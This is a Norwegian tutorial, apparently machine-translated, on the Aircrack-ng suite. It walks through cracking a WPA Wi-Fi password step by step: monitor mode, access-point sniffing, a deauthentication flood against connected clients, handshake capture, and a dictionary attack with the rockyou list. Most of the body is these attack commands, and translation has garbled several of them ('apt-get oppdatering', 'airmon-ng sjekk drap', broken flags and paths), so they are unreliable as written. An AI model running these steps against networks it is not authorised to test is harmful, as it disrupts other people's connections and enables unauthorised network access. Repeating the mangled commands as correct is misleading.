Airmon-ng
Airmon-Ng brukes til å administrere trådløse kortmodus og for å drepe unødvendige prosesser mens du bruker Aircrack-Ng. For å snuse en trådløs tilkobling, må du endre det trådløse kortet fra administrert modus for å overvåke modus og fly-ng brukes til det formålet.
AIRODUMP-NG
AIRODUMP-NG er en trådløs sniffer som kan fange trådløse data fra ett eller flere trådløse tilgangspunkter. Det brukes til å analysere tilgangspunkter i nærheten og for å fange håndtrykk.
Aireplay-ng
Aireplay-Ng brukes til repriseangrep og som pakkeinjektor. Det kan være de-autentiserende brukere fra AP-ene for å fange håndtrykk.
Airdecap-ng
Airdecap-ng brukes til å dekryptere kryptert WEP, WPA/WPA2 trådløse pakker med kjent nøkkel.
Aircrack-ng
Aircrack-ng brukes til å angripe WPA/WEP trådløse protokoller for å finne nøkkelen.
Aircrack-ng er enkelt å installere i Ubuntu ved å bruke APT. Bare skriv inn følgende kommando, og dette vil installere alle verktøy som er tilgjengelige i Aircrack-Ng Suite.
sudo apt-get oppdatering
sudo apt-get install -y aircrack-ng
Bruk
I denne artikkelen tar vi en rask titt på hvordan du bruker Aircrack-Ng for å knekke et kryptert trådløst nettverk (TR1ckst3R i dette eksemplet) for å finne passordet.
Først av alt, list ut alle tilgjengelige trådløse kort koblet til PC -en din ved å bruke 'IWConfig' -kommandoen.
Vi bruker 'WLXC83A35CB4546' kalt Wireless Card for denne opplæringen (dette kan være annerledes i ditt tilfelle). Nå, drep alle prosessene som kjører på trådløst kort ved hjelp av Airmon-Ng.
ubuntu@ubuntu: ~ $ sudo airmon-ng sjekk drap
Start Monitor -modus på 'WLXC83A35CB4546' ved å skrive
ubuntu@ubuntu: ~ $ sudo airmon-ng start wlxc83a35cb4546
Nå har Airmon-NG startet Monitor-modus på trådløst kort, det vil vises som et annet navn 'WLAN0mon'. Kjør 'iwconfig' igjen for å liste opp trådløse detaljer.
Bruk deretter AiroDump-Ng for å se nærliggende trådløse tilgangspunkter og deres egenskaper.
ubuntu@ubuntu: ~ $ sudo airoDump-ng wlan0mon
Du kan begrense søk ved hjelp av Mac (-bssid) og kanal (-c) filtre. For å fange håndtrykk (håndtrykk inneholder kryptert passord), må vi lagre pakkene våre et sted ved å bruke "-skriv" -alternativet. Type,
ubuntu@ubuntu: ~ $ sudo airoDump-ng--bssid 6c: b7: 49: fc: 62: e4
-C 11 WLAN0mon -Skriv /TMP /Handshake.lokk
--BSSID: Access Points MAC -adresse
-C: Access Point's Channel [1-13]
--Skriv: Butikker fangede pakker på et definert sted
Nå må vi de-autentisere alle enheter fra dette tilgangspunktet ved hjelp av AirePlay-NG-verktøyet. Skrive
ubuntu@ubuntu: ~ $ sudo aireplay -ng -0 100 -a [mac_add] wlan0mon
-A: Spesifiser tilgangspunkter Mac for AirePlay-ng
-0: Spesifiser antall DEAUTH -pakker som skal sendes
Etter en stund vil alle enheter bli koblet fra det tilgangspunktet, når de vil prøve å koble seg på nytt, vil det å kjøre Airrodump-ng fange håndtrykk. Det vil vises på toppen av å løpe Airrodump-ng.
Håndtrykk lagres i '/tmp/' katalog, og inneholder kryptert passord som kan tvinges frakoblet ved hjelp av en ordbok. For å knekke passordet, bruker vi Aircrack-ng. Type
ubuntu@ubuntu: ~ $ sudo aircrack-ng /tmp /håndtrykk.CAP-01.Cap -W
/usr/share/wordlists/rockyou.tekst
-W: Spesifiser ordboken
Aircrack-ng vil gå gjennom listen over passord, og hvis den blir funnet, vil den vise passordet som brukes som tast.
I dette tilfellet fant Aircrack-ng passordet som ble brukt '123456789'.
Stopp Monitor-modus på trådløst kort og start nettverkssjefen på nytt.
ubuntu@ubuntu: ~ $ sudo airmon-ng stopp wlan0mon
ubuntu@ubuntu: ~ $ sudo service nettverk-manager omstart
Konklusjon
Aircrack-ng kan brukes til å revidere trådløs sikkerhet eller for å knekke glemte passord. Det er noen andre lignende verktøy tilgjengelig for dette formålet som Kismet, men Aircrack-Ng er bedre kjent for god støtte, allsidighet og å ha et bredt spekter av verktøy. Det har enkelt å bruke kommandolinjegrensesnitt som enkelt kan automatiseres ved hjelp av et hvilket som helst skriptspråk som Python.